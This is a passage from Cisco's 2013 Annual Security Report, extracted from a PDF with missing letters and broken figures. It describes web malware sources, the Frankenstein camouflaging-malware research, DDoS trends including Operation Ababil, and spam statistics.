encounters. Syndicated advertising

is a common means o monetizingwebsites, so a single malicious ad

distributed in this manner can have a

dramatic, adverse impact.

Figure 7: Top Site CategoryOnline shopping sites are 21 times more likely to deliver malicious content than countereit

sotware sites.

Note: The Dynamic Content category is at the top o Ciscos list o top locations or the

likelihood o malware inections. This category includes content-delivery systems such as web

statistics, site analytics, and other non-advertising-related third-party content.

Games 6.51%

Web Hosting4.98%

Search Engines

& Portals 4.53%

Computers &

Internet 3.57%

Shopping 3.57%

Travel 3.00%

Online Communities 2.66%

Entertainment 2.57%

Online Storage &

Backup 2.27%

News 2.18%

Sports & Recreations

2.10%

File Transfer Services1.50%

SaaS &

B2B

1.40%

Web-

Based

Email

1.37%

Education

1.17%

Transportation

1.11%

Health &

Nutrition

0.97%

Dynamic Content

& CDN 18.30%Advertisements16.81%Business &

Industry 8.15%

i l

The vast majority o webmalware encounters actuallyoccur via legitimate browsing omainstream websites. In otherwords, the majority o encountershappen in the places that online

users visit the mostand thinkare sae.


23/41


Figure 8: Popular Applications by HitsSocial media and online video change how employees spend their time at workand expose

new vulnerabilities.

Looking urther down the list o site

categories through which malware

encounters occurred, business

and industry siteswhich include

everything rom corporate sites to

human resources to reight services

are in third place. Online gaming is in

ourth place, ollowed by web hosting

sites and search engines in ith and

sixth places, respectively. The top20 website categories are absent o

sites typically thought o as malicious.

There is a healthy mix o popular and

legitimate site types such as online

shopping (#8), news (#13), and

SaaS/business-to-business

applications (#16).

Cybercriminals have paid close

attention to modern browsing habits

to expose the latest possible deliver

population to malware. Where the

online users are, malware creators

will ollow, taking advantage o trusted

websites through direct compromise

or third-party distribution networks.

Popular Applicationsby HitsChanges in how people spend

their time online are expanding the

surace or cybercriminals to launch

exploits. Organizations o all sizes are

embracing social media and onlinevideo; most major brands have a

presence on Facebook and Twitter,

and many are integrating social media

into their actual products. As these

web destinations draw massive

audiences and are accepted into

enterprise settings, more opportunities

to deliver malware are also created.

According to data rom Cisco

Application Visibility and Control

(AVC), the vast majority (91 percent)o web requests were split among

search engines (36 percent); online

video sites (22 percent); advertising

networks (13 percent); and social

networks (20 percent).

I the data on the top websites visited

across the Internet is correlated with

the most dangerous category o

website, the very same places online

users have the most exposure to

malware, such as search engines, are

among the top areas that drive web

malware encounters. This correlation

shows once again that malware

creators are ocused on maximizing

their ROIand thereore, they will

center their eorts on the places

where the number o users and ease

o exposure are greatest.

I the data on the top websites visited across the Internet is correlatedwith the most dangerous category o website, the very same placesonline users have the most exposure to malware, such as searchengines, are among the top areas that drive web malware encounters.

Cybercriminals have paid closeattention to modern browsinghabits to expose the latestpossible deliver populationto malware.

Organizations o all sizes areembracing social media andonline video; most major brandshave a presence on Facebookand Twitter, and many areintegrating social media intotheir actual products.

36%

9% Search Engine

Ads

Social Network

Other

20%

13%

22%

Online Video

li i i


24/41


When Gothic Horror Gives Birth to Malwareby Kevin W. Hamlen

Associate Proessor, Computer Science Department, The University o Texas at Dallas

Malware camouflage is an emerging threat that security proessionals may increasingly ace.

While most malware already uses simple mutation or obuscation to diversiy and make itsel

harder to reverse-engineer, sel-camoulaging malware is even stealthier, blending in withthe speciic sotware already present on each system it inects. This can elude deenses that

look or sotware anomalies like runtime unpacking or encrypted code, which oten expose

more conventional malware.

The latest sel-camoulaging malware technologyappropriately dubbed Frankenstein17is

a product o our research this year in the Cyber Security Research and Education Center

at The University o Texas at Dallas. Like the ictional mad scientist in Mary Shelleys 1818

horror novel, Frankenstein malware creates mutants by stealing body parts (i.e., code)

rom other sotware it encounters and stitches the code together to create unique variants o

itsel. Each Frankenstein mutant is thereore composed entirely o non-anomalous, benign-

looking sotware; perorms no suspicious runtime unpacking or encryption; and has access

to an ever-expanding pool o code transormations learned rom the many programs it

encounters.

Under the hood, Frankenstein brings its creations to lie using an array o techniques drawnrom compiler theory and program analysis. Victim binaries are irst scanned or short byte

sequences that decode to potentially useul instruction sequences, called gadgets. A small

abstract interpreter next iners the possible semantic eects o each gadget discovered.

Backtracking search is then applied to discover gadget sequences that, when executed in

order, have the eect o implementing the malware payloads malicious behavior.

17 Vishwath Mohan and Kevin W. Hamlen. Frankenstein: Stitching Malware rom Benign Binaries. In Proceedingsof the USENIX Workshop on Offensive Technologies (WOOT), pp. 77-84, August 2012.

18 Mohammad M. Masud, Tahseen M. Al-Khateeb, Kevin W. Hamlen, Jing Gao, Latiur Khan, Jiawei Han, andBhavani Thuraisingham. Cloud-based Malware Detection or Evolving Data Streams.ACM Transactions onManagement Inormation Systems (TMIS), 2(3), October 2011.

Each such discovered sequence is inally assembled to orm a resh mutant. In practice,

Frankenstein discovers over 2,000 gadgets per second, accumulating over 100,000 rom

just two or three victim binaries in under ive seconds. Wit h such a large gadget pool at

their disposal, the resulting mutants rarely share any common instruction sequences; each

thereore looks unique.

In general, our research suggests that next-generation malware may increasingly eschew

simple mutations based on encryption and packing in avor o advanced metamorphic

binary obuscations like those used by Frankenstein. Such obuscations are easible toimplement, support rapid propagation, and are eective or concealing malware rom the

static analysis phases o most malware detection engines. To counter this trend, deenders

will need to deploy some o the same technologies used to develop Frankenstein, including

static analyses based on semantic, rather than syntactic, eature extraction, and semantic

signatures derived rom machine learning18 rather than purely manual analysis.

This article reports research supported in part by National Science Foundation (NSF) award

#1054629 and U.S. Air Force Office of Scientific Research (AFOSR) award FA9550-10-1-

0088. Any opinions, findings, conclusions, or recommendations expressed are those of the

author and do not necessarily reflect those of the NSF or AFOSR.

Like the ictional mad scientist in Mary Shelleys 1818 horror novel,Frankenstein malware creates mutants by stealing body parts

(i.e., code) rom other sotware it encounters and stitches the codetogether to create unique variants o itsel.

In general, our research suggests that next-generation malwaremay increasingly eschew simple mutations based on encryption andpacking in avor o advanced metamorphic binary obuscations likethose used by Frankenstein.


25/41


2012 Vulnerability and Threat AnalysisThe Vulnerability and Threat Categories chart shows a signiicant increase in threat totals

in 2012, threats increased 19.8 percent over 2011. This sharp increase in threats is placing

a serious strain on the ability o organizations to keep vulnerability management systems

updated and patchedespecially given the shit to virtual environments.

Organizations are also attempting to address the increasing use o third-party and open-

source sotware included in their products and in their environments. Just one vulnerability

in third-party or open-source solutions can impact a broad range o systems across the

environment, which makes it very diicult to identiy and patch or update all those systems,

says Je Shipley, Manager o Cisco Security Research and Operations.

As or the types o threats, the largest group is resource management threats; this generally

includes denial o service vulnerabilities, input validation threats such as SQL injection

and cross-site scripting errors, and buer overlows that result in denial o service. The

preponderance o similar threats rom previous years, combined with the sharp increase in

threats, indicates that the security industry needs to become better equipped at detecting

and handling these vulnerabilities.

The Cisco IntelliShield Alert Urgency Ratings relect the level o threat activity related to

speciic vulnerabilities. The substantial increase in Level 3 urgency ratings indicates that

more vulnerabilities are actually being exploited. This is likely due to the increase in publicly

released exploits either by researchers or test tools, and the incorporation o those exploits

into attack toolkits. These two actors are allowing more exploits to be available and usedacross the board by hackers and criminal groups.

The Cisco IntelliShield Alert Severity Ratings relect the impact level o successul

vulnerability exploits. The severity ratings also show a noticeable increase in Level 3

threatsor the same reasons indicated above relating to the ready availability o

exploit tools.

Figure 10: Vulnerability and Threat Categories

Figure 9: Urgency and Severity Ratings

2012 Monthly

Alert Numbers

2011 Monthly

Alert Numbers

2010 Monthly

Alert Numbers

JanuaryFebruary

March

April

May

June

July

August

September

October

November

December

552 344 208 552551 317 234 1103

487 238 249 1590

524 306 218 2114

586 343 243 2700

647 389 258 3347

514 277 237 3861

591 306 285 4452

572 330 242 5024

517 280 237 5541

375 175 200 5916

376 183 193 6292

403 237 166 403400 176 224 803

501 276 225 1304

475 229 246 1779

404 185 219 2183

472 221 251 2655

453 213 240 3108

474 226 248 3582

441 234 207 4023

558 314 244 4581

357 195 162 4938

363 178 185 5301

417 259 158 417430 253 177 847

518 324 194 1364

375 167 208 1740

322 174 148 2062

534 294 240 2596

422 210 212 3018

541 286 255 3559

357 167 190 3916

418 191 227 4334

476 252 224 4810

400 203 197 5210

Total Ream p NewTotal Reamp NewTotal Ream p New

6292 3488 28045301 2684 26175210 2780 2430

0

1000

2000

3000

4000

5000

6000

7000

8000


2010 2011 2012

i

i

i

l

l

l

l

l

l

il

l

2010 2011 2012

Severity 3

Severity 4

Severity 5

Urgency 3

Urgency 4

Urgency 5

0 10 20 30 40 50 60 0 500 1000 1500 2000

Rating Rating

Just one vulnerability in third-party or open-source solutions can impacta broad range o systems across the environment, which makes it verydiicult to identiy and patch or update all those systems.

Je Shipley, Manager Cisco Security Research and Operations


26/41


EvolutionaryThreats

New Methods,Same Exploits

This is not to say that actors in the

shadow economy do not remain

committed to creating ever-more

sophisticated tools and techniques to

compromise users, inect networks,

and steal sensitive data, among many

other goals. In 2012, however, there

was a trend toward reaching back

to oldies but goodies to ind new

ways to create disruption or evade

enterprise security protections.

DDoS attacks are a primary example

several major U.S. inancial institutions

were the high-proile targets o two

major and related campaigns launched

by oreign hacktivist groups in the

last six months o 2012 (or detailed

analysis, see the 2012 Distributed

Denial o Service Trends section.

Some security experts warn that these

events are just the beginning and that

hacktivists, organized crime rings,

and even nation states will be the

perpetrators19 o these attacks in the

uture, working both collaboratively

and independently.

We are seeing a trend in DDoS, with

attackers adding additional context

about their target site to make the

outage more signiicant, says

Gavin Reid. Instead o doing a SYN

lood, the DDoS now attempts tomanipulate a speciic application in

the organizationpotentially causing

a cascading set o damage i it ails.

In 2012, however, there wasa trend toward reaching backto oldies but goodies to ind

new ways to create disruptionor evade enterprise securityprotections.


27/41


While enterprises may believe they

are adequately protected against the

DDoS threat, more than likely their

network could not deend against the

type o high-volume and relentless

DDoS attacks witnessed in 2012.

Even against a sophisticatedbut

averageadversary, the currentstate o the art in network security

is oten signiicantly outmatched,

says Gregory Neal Akers, Senior Vice

President or the Advanced Security

Initiatives Group at Cisco.

Another trend in the cybercrime

community revolves around the

democratization o threats. We are

increasingly seeing that the tools

and techniquesand intelligence

about how to exploit vulnerabilities

are being broadly shared in the

shadow economy today. Tradecrat

capabilities have evolved a great deal,

Akers says. Were now seeing more

specialization and more collaboration

among malicious actors. Its a threat

assembly line: Someone develops a

bug, someone else writes the malware,

another person designs the social

engineering component, and so on.

Creating potent threats that will

help them gain access to the large

volumes o high-value assets comingacross the network is one reason that

cybercriminals are combining their

expertise more oten. But like any real-

world organization that outsources

tasks, eiciency and cost savings

are among the primary drivers or

the build-a-threat approach in the

cybercrime community. The reelance

talent hired or these tasks typically

advertise their skills and pay rates to

the broader cybercrime community via

secret online marketplaces.

Even against a sophisticatedbutaverageadversary, the currentstate o the art in networksecurity is oten signiicantlyoutmatched.

Gregory Neal Akers, Senior Vice Presidentor the Advanced Security Initiatives Group

at Cisco

Ampliication and Relection AttacksDNS ampliication and relection attacks21 utilize domain name system (DNS) open recursive

resolvers or DNS authoritative servers to increase the volume o attack traic sent to a

victim. By spooing22 DNS request messages, these attacks conceal the true source o

the attack and send DNS queries that return DNS response messages 1,000 to 10,000

percent larger than the DNS request message. These types o attack proiles are commonly

observed during DDoS23 attacks.

Organizations are inadvertently participating in these attacks by leaving open recursive

resolvers out on the Internet. They can detect the attacks using various tools 24 and low

telemetry25 technologies and can help prevent them by securing26 their DNS server or

rate-limiting27 DNS response messages.

2012 Distributed Denial o Service TrendsThe ollowing analysis is derived rom the Arbor Networks ATLAS repository, which consists

o global data gathered rom a number o sources, including more than 240 IPSs, monitoring

peak traic o 37.8 Tbps.28

Attack Sizes Continue to Trend Upward

Overall, there has been an increase in the average size o attacks over the past year. There

was a 27 percent increase in throughput o attacks (1.23 Gbps in 2011 to 1.57 Gbps in 2012)and a 15 percent increase in the packets per second used in attacks (1.33 Mpps in 2011 to

1.54 Mpps in 2012).

Attack Demographics

The top three monitored attack sources, ater removing 41 percent o sources or which

there is no attribution due to data anonymization, are China (17.8 percent), South Korea

(12.7 percent), and t he United States (8.0 percent).

Largest Attacks

The largest monitored attack was measured at 100.84 Gbps and lasted approximately 20

minutes (source o attack is unknown due to data anonymization). The corresponding largest

monitored attack in (pps) was measured at 82.36 Mpps and lasted approximately 24 minutes

(source o attack is unknown due to data anonymization).


28/41


Weaponization o ModernEvasion TechniquesCybercriminals are constantly evolving

new techniques to bypass security

devices. Cisco researchers watch

vigilantly or new techniques and

the weaponization o well-knowntechniques.

Cisco Security Research and

Operations runs several malware labs

to observe malicious traic in the

wild. Malware is intentionally released

in the lab to ensure security devices

are eective; computers are also let

intentionally vulnerable and exposed to

the Internet.

During one such test, Cisco Intrusion

Prevention System (IPS) technology

detected a well-known Microsot

Remote Procedure Call (MSRPC)

attack. Careul analysis determined

that the attack was utilizing a

previously unseen malware evasion

tactic in an attempt to bypass security

devices.20 The evasion sent several

bind context IDs inside the initial bind

request. This type o attack can evade

protections unless the IPS monitors

and determines which o the IDs were

successul.

Figure 11: Live Intrusion Prevention System (IPS) Evasions

Cisco Security Research and Operations runs several malware labs toobserve malicious traic in the wild. Malware is intentionally releasedin the lab to ensure security devices are eective; computers are alsolet intentionally vulnerable and exposed to the Internet.

Cybercriminals are constantlyevolving new techniques tobypass security devices. Ciscoresearchers watch vigilantlyor new techniques and theweaponization o well-knowntechniques.


29/41


CASE STUDY

Operation AbabilDuring September and October 2012, Cisco and Arbor Networks monitored a targeted

and very serious DDos attack campaign known as Operation Ababil, which was aimed

at U.S.-based inancial institutions, known as Operation Ababil. The DDoS attacks were

premeditated, ocused, advertised beore the act, and executed to the letter. Attackers

were able to render several major inancial sites unavailable to legitimate customers or a

period o minutesand in the most severe instances, hours. Over the course o the events,

several groups claimed responsibility or the attacks; at least one group purported to

be protesting copyright and intellectual property legislation in the United States. Others

broadcast their involvement as a response to a YouTube video oensive to some Muslims.

From a cybersecurity standpoint, Operation Ababil is notable because it took advantage o

common web applications and hosting servers that are as popular as they are vulnerable.

The other obvious and uncommon actor used in this series o attacks was that simultaneous

attacks, at high bandwidth, were launched against multiple companies in the same industry

(inancial).

As is oten seen in the security industry, whats old is new again.

On September 18, 2012, Cyber Fighters o Izz ad-Din al-Qassam posted on Pastebin29

beseeching Muslims to target major inancial institutions and commodities trading platorms.

The threats and speciic targets were put up or the world to see and continued or our

consecutive weeks. Each week, new threats with new targets were ollowed up by actions

at the appointed times and dates. By the ith week, the group stopped naming targets

but made it clear that campaigns would continue. As promised, the campaigns renewed in

earnest in December 2012, once again targeting multiple large U.S. inancial organizations.

Phase 2 o Operation Ababil was also announced on on Pastebin.30 Instead o inected

machines, a variety o PHP web applications, including the Joomla Content Management

System, served as the primary bots in the campaign. Additionally, many WordPress sites,

oten using the out-o-date TimThumb plug-in, were being compromised around the same

time. The attackers oten went ater unmaintained servers hosting these applications and

uploaded PHP webshells to deploy urther attack tools. The concept o command and

control did not apply in the usual manner, however; the attackers connected to the tools

directly or through intermediate servers, scripts, and proxies. During the cyber events in

September and October 2012, a wide array o iles and PHP-based tools were used, not just

the widely reported tsoknoproblembro (aka Brobot). The second round o activity also

utilized updated attack tools such as Brobot v2.

Operation Ababil deployed a combination o tools with vectors crossing application-layer

attacks on HTTP, HTTPS, and DNS with volumetric attack traic on a variety o TCP, UDP,

ICMP, and other IP protocols. Ciscos analysis showed that the majority o packets were

sent to TCP/UDP port 53 (DNS) or 80 (HTTP). While traic on UDP port 53 and TCP port

53 and 80 represent normally valid traic, packets destined or UDP port 80 represent an

anomaly not commonly used by applications.

A detailed report o the patterns and payloads o the Operation Ababil campaign can

be ound in Cisco Event Response: Distributed Denial o Service Attacks on FinancialInstitutions. 31

Lessons LearnedWhile they are a critical part o any network security portolio, IPS and irewall devices rely

on stateul traic inspection. Application-layer techniques used in the Operation Ababil

campaign easily overwhelmed those state tables and, in several cases, caused them to

ail. Intelligent DDoS mitigation technology was the only eective countermeasure.

Managed security services and ISPs have their limits. In a typical DDoS attack, the prevailing

wisdom says to deal with volumetric attacks in the network. For application-layer campaigns

that are deployed closer to the victim, these should be addressed at the data center or on

the customer edge. Because multiple organizations were targeted concurrently, network

scrubbing centers were strained.

It is critical to keep hardware and sotware current on DDoS mitigation appliances. Older

deployments are not always able to deal with newer threats. It is also important to have the

right capacity in the right locations. Being able to mitigate a large attack is useless i traic

cannot be channeled to the location where the technology has been deployed.

While cloud or network DDoS mitigation typically has much higher bandwidth capacity,

on-premise solutions provide better reaction time against, control o, and visibility into the

attacks. Combining the two makes or a more complete solution.

In conjunction with cloud and network DDoS technologies, and as part o the collateral

produced or the Operation Ababil events, Cisco has outlined detection and mitigation

techniques in the Identiying and Mitigating the Distributed Denial o Service Attacks

Targeting Financial Institutions Applied Mitigation Bulletin.32 These techniques include

the use o Transit Access Control List (tACL) iltering, NetFlow data analysis, and unicast

Reverse Path Forwarding (uRPF). In addition, there are a number o best practices that

should be regularly reviewed, tested, and implemented that will greatly help enterprisesto prepare or and react to network events. A library o these best practices can be ound

by reerencing the Cisco SIO Tactical Resources33 and Service Provider Security Best

Practices.34


30/41


Spam theEver Present

However, despite the perception

that malware is typically deployed

through spam email attachments,Ciscos research shows that very ew

spammers today rely on this method;

instead, they turn to malicious links

within the email as a ar more eicient

distribution mechanism.

Spam is also less scattershot than

in the past, with many spammers

preerring to target speciic groups

o users with the hope o generating

higher returns. Name-brand

pharmaceuticals, luxury watch brands,and events such as tax season top the

list o things that spammers promote

most in their campaigns. Over time,

spammers have learned that the

quickest way to attract clicks and

purchasesand to generate a proitis

to leverage spooed brands and takeadvantage o current events that have

the attention o large groups o users.

Global Spam TrendsSince the large-scale botnet

takedowns o 2010, high-volume

spam isnt as eective as it once

was, and spammers have learned

and changed their tactics. There is a

clear evolution toward smaller, more

targeted campaigns based on world

events and particular subsets o users.

High-volume spam is also more likely

to be noticed by mail providers and

shut down beore its purpose can

be ulilled.


31/41


Figure 12: Global Spam TrendsGlobal spam volumes down 18 percent, with most spammers keeping bankers hours

on weekends.

United States

Saudi Arabia

Brazil

11.38%

3.60%

Poland2.72%

Taiwan2.94%

Vietnam4.00%

3.60%

India12.3%

Russia3.88%

China

4.19%

Korea

4.60%

10

9

8

7

6

5

432

1

GAIN FROM 2011 DECLINE FROM 2011

Russian

5%

Catalan

3%

Japanese

3%

Danish

2%

French

1%

Romanian

1%

Spanish

1%

German

1%

English

79% Chinese

1%

Spam Language

High-volume spam is more likely to be noticed by mail providers andshut down beore its purpose can be ulilled.


32/41


In 2011, overall global spam volumes

were down 18 percent. This is ar rom

the dramatic drop in volume seen in

2010 ollowing the botnet takedowns,

but the continued downward trend is a

positive development nonetheless.

Spammers continue their ocus on

minimizing eort while maximizing

impact. According to Ciscos research,

spam volumes all by 25 percent onweekends, when users are oten away

rom their email. Spam volumes rise

to the highest levels on Tuesday and

Wednesdayan average o 10 percent

higher than on other weekdays. This

heightened activity in the middle o

the week and lower volumes on the

weekend allow spammers to live

normal lives.

It also gives them time to spend

crating tailored campaigns based onworld events early in the week that

will help them to generate a higher

response rate to their campaigns.

In 2012, there were several examples

o spammers using news about world

eventsand even human tragedyto

take advantage o users. During

Superstorm Sandy, or example, Cisco

researchers identiied a massive

pump and dump stock scam based

around a spam campaign. Using

a pre-existing email message that

urged people to invest in a penny

stock ocused on natural resource

exploration, the spammers began

attaching sensational headlines about

Superstorm Sandy. An unusual aspect

o this campaign is that the spammers

utilized unique IP addresses to send a

batch o spamand have not activated

those addresses since.

Spam OriginationIn the world o spam, some countries

remain the same while others

dramatically change their rankings. In

2012, India retains the top spot as a

source o spam worldwide, with the

United States moving up rom sixth in

2011 to second in 2012. Rounding out

the top ive spam-originating countries

are Korea (third), China (ourth) and

Vietnam (ith).

Overall, the majority o spammers

ocus their eorts on creating spam

messages that eature the languages

In 2012, there were severalexamples o spammers usingnews about world eventsandeven human tragedyto takeadvantage o users.

Figure 13: Spam OriginationIndia retains spam crown, and United States skyrockets into second position.

-25%

+10%MONDAY

TUESDAY

WEDNESDAY

THURSDAY

FRIDAY

SATURDAY

SUNDAY

GAIN FOR MIDDLE

OF THE WEEK

DECLINE FOR WEEKENDS

-18%DECLINE FROM 2011 TO 2012

SPAM VOLUMES

I

spoken by the largest audiences

who use email on a regular basis.

According to Ciscos research, the

top language or spam messages in

2012 was English, ollowed by Russian,Catalan, Japanese, and Danish. O

note, there are gaps between where

spam is being sent rom and the

languages that are being used in

the spam message; or example,

while India was the number one

spam-originating country in 2012,

local dialects did not break the top10 in terms o languages used in spam

sent rom India. The same was true

or Korea, Vietnam, and China.


33/41


Email AttachmentsSpam has long been thought o as

a delivery mechanism or malware,

especially when an attachment is

involved. But Ciscos recent research

on the use o email attachments in

spam campaigns shows that thisperception may be a myth.

Only 3 percent o total spam has an

attachment, versus 25 percent o

valid email. And in the rare cases

when a spam message does include

an attachment, it is an average o

18 percent larger than a typical

attachment that would be included

in valid email. As a result, these

attachments tend to stand out.

In modern email, links are king.

Spammers design their campaigns

to convince users to visit websites

where they can purchase products

or services (oten dubious). Once

there, users personal inormation

is collected, oten without their

knowledge, or they are compromised

in some other way.

As the Spooed Brands analysis that

appears later in this section reveals, a

majority o spam comes rom groups

who seek to sell a very speciic group

o name-brand goodsrom luxury

watches to pharmaceuticalsthat are,

in most cases, ake.

IPv6 SpamWhile IPv6-based email remains a very

small percentage o overall traic, it is

growing as more email users move to

IPv6-enabled inrastructure.

However, while overall email

volumes are growing at a rapid

clip, this is not the case with IPv6

spam. This suggests that spammers

are hedging against the time and

expense to migrate to the new

Internet standard. There is no driving

need or spammersand little to no

material beneitto cause such a shit

at present. As IPv4 addresses are

exhausted and mobile devices and

M2M communication drive explosive

growth in IPv6, expect spammers

to upgrade their inrastructure and

accelerate their eorts.

Figure 15: IPv6 SpamWhile IPv6-based email remains a very small percentage o overall traic, it is growing as

more email users move to IPv6-enabled inrastructure.

Figure 14: Email AttachmentsOnly 3 percent o spam has an attachment versus 25 percent o valid email,

but spam attachments are 18 percent larger.

In modern email, links are king. Spammers design their campaigns toconvince users to visit websites where they can purchase products orservices. Once there, users personal inormation is collected, otenwithout their knowledge, or they are compromised in some other way.

l li il

3% 25%

18%

Valid EmailSpam Email

Spam attachments are 18% larger

JUN JUL AUG SEP OCT NOV DEC

IPv6 Email Growth: 862%

IPv6 Spam Growth: 171%


34/41


Spooed BrandsWith spooed-brands spam email,

spammers use organizations and

products to send their messages in

hopes that online users click on a link

or make a purchase. The majority o

spooed brands are prescription drugs,such as anti-anxiety medication and

painkillers. In addition, luxury watch

brands orm a constant layer o noise

that retains consistency across the

entire year.

Ciscos analysis shows that spammers

are also skilled at tying their

campaigns to news events. From

January to March 2012, Cisco data

shows a spike in spam relating to

Windows sotware, which coincided

with the release o the Windows 8

operating system. From February to

April 2012, during the U.S. tax season,

analysis shows a

Raportul Cisco pe Securitate 2013

Documents

Transcript of Raportul Cisco pe Securitate 2013